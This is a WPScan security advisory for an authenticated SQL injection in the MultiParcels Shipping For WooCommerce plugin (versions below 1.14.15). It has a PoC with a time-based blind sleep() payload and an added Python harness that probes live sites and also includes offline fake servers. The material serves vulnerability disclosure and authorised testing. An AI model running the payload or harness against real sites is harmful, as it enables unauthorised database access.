wpvulndb | Dao Xuan Hieu | WPVDB-ID: 8E713EAF-F332-47E2-A131-C14222201FDC
History: Jul 17, 2023 - 12:00 a.m.

MultiParcels Shipping For WooCommerce < 1.14.15 - Subscriber+ SQLi

2023-07-17 00:00:00
Dao Xuan Hieu
wpscan.com
Tags: sql injection, woocommerce, security vulnerability, patched, authenticated users, subscriber

AI Score: 8.9 High (Confidence: High)
EPSS: 0.001 Low (Percentile: 19.9%)

Description: The plugin does not sanitize or escape the `id` parameter of the `multiparcels_delete_shipping` admin-post action before using it in an SQL statement, which allows any authenticated user, including a Subscriber, to perform SQL Injection attacks. Note (WPScan): the issue was first fixed in 1.14.13; a better patch was released in 1.14.15 as per our suggestion, which is why the affected range is given as < 1.14.15.

PoC

1. Install the WooCommerce plugin (dependency, no setup required) and the vulnerable plugin MultiParcels Shipping For WooCommerce version 1.14.12 (no setup required).
2. Log in as a Subscriber user, visit this URL and intercept the request: http://example.com/wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=1
3. Inject the payload into the `id` parameter, for example: GET /wp-admin/admin-post.php?action=multiparcels_delete_shipping&id=(select*from(select(sleep(10)))a) HTTP/1.1
   A response that takes roughly 10 seconds longer than the request from step 2 confirms that the value reached MySQL unescaped (time-based blind injection).
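The following is an added example, not code from the WPScan advisory or from the MultiParcels plugin: a small harness that builds the time-based probe from the PoC above, measures the round trip against a baseline request, and decides whether the backend evaluated `sleep()`. The function names, the tolerance value, the two fake transports and their timings are constructed for the example; against a real site you would pass a `timed_get` bound to a `requests.Session` that is already logged in as a Subscriber.

```python
"""Time-based blind SQLi check for the `id` parameter of
admin-post.php?action=multiparcels_delete_shipping (added example, not plugin code)."""
from __future__ import annotations

import re
import time
from typing import Callable
from urllib.parse import urlencode

ACTION = "multiparcels_delete_shipping"
FIXED_VERSION = (1, 14, 15)  # threshold used in the advisory title (< 1.14.15)


def build_probe_url(base_url: str, delay: int | None = None) -> str:
    """Baseline request when delay is None; otherwise the sleep() payload from the PoC."""
    value = "1" if delay is None else f"(select*from(select(sleep({delay})))a)"
    # keep ( ) * literal so the URL reads like the PoC; WordPress decodes either form
    query = urlencode({"action": ACTION, "id": value}, safe="()*")
    return f"{base_url.rstrip('/')}/wp-admin/admin-post.php?{query}"


def looks_time_based(baseline_s: float, delayed_s: float, delay: int,
                     tolerance: float = 0.8) -> bool:
    """True when the payload request took at least delay*tolerance seconds longer
    than the baseline; the slack absorbs ordinary network jitter."""
    return (delayed_s - baseline_s) >= delay * tolerance


def probe(timed_send: Callable[[str], float], base_url: str,
          delay: int = 10, rounds: int = 2) -> dict:
    """timed_send(url) performs one authenticated GET and returns elapsed seconds.
    Every round must show the delay, so a single slow response is not a finding."""
    hits = []
    for _ in range(rounds):
        baseline = timed_send(build_probe_url(base_url))
        delayed = timed_send(build_probe_url(base_url, delay))
        hits.append(looks_time_based(baseline, delayed, delay))
    return {"vulnerable": all(hits), "rounds": rounds, "delay": delay}


def timed_get(session, url: str) -> float:
    """Real transport: GET through an authenticated requests.Session (duck-typed here
    so the file runs without requests installed) and return elapsed seconds."""
    t0 = time.perf_counter()
    session.get(url, allow_redirects=False, timeout=60)
    return time.perf_counter() - t0


def version_is_vulnerable(version: str) -> bool:
    """Flag plugin versions below the advisory's fix threshold, e.g. from the readme Stable tag."""
    return tuple(int(p) for p in version.split(".")) < FIXED_VERSION


# --- constructed stand-ins for offline use (no real site is contacted) ---------------
_SLEEP_RE = re.compile(r"sleep\((\d+)\)")


def fake_vulnerable_server(url: str) -> float:
    """Models an unpatched 1.14.12 site: `id` goes straight into the SQL statement,
    so MySQL evaluates sleep(N) and the response takes about N seconds."""
    m = _SLEEP_RE.search(url)
    return 0.12 + (int(m.group(1)) if m else 0.0)


def fake_patched_server(url: str) -> float:
    """Models a >= 1.14.15 site: the parameter is prepared, the payload is never evaluated."""
    return 0.12


if __name__ == "__main__":
    print(build_probe_url("http://example.com", 10))
    print("unpatched:", probe(fake_vulnerable_server, "http://example.com"))
    print("patched:  ", probe(fake_patched_server, "http://example.com"))
    print("1.14.13 still below threshold:", version_is_vulnerable("1.14.13"))
```

Use a delay that is clearly above the site's normal response variance (the PoC's 10 seconds is a reasonable default) and keep `rounds` at two or more; because the action deletes a shipping record when `id` is a valid integer, run the baseline with an `id` that does not exist on a production site you are authorized to test.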
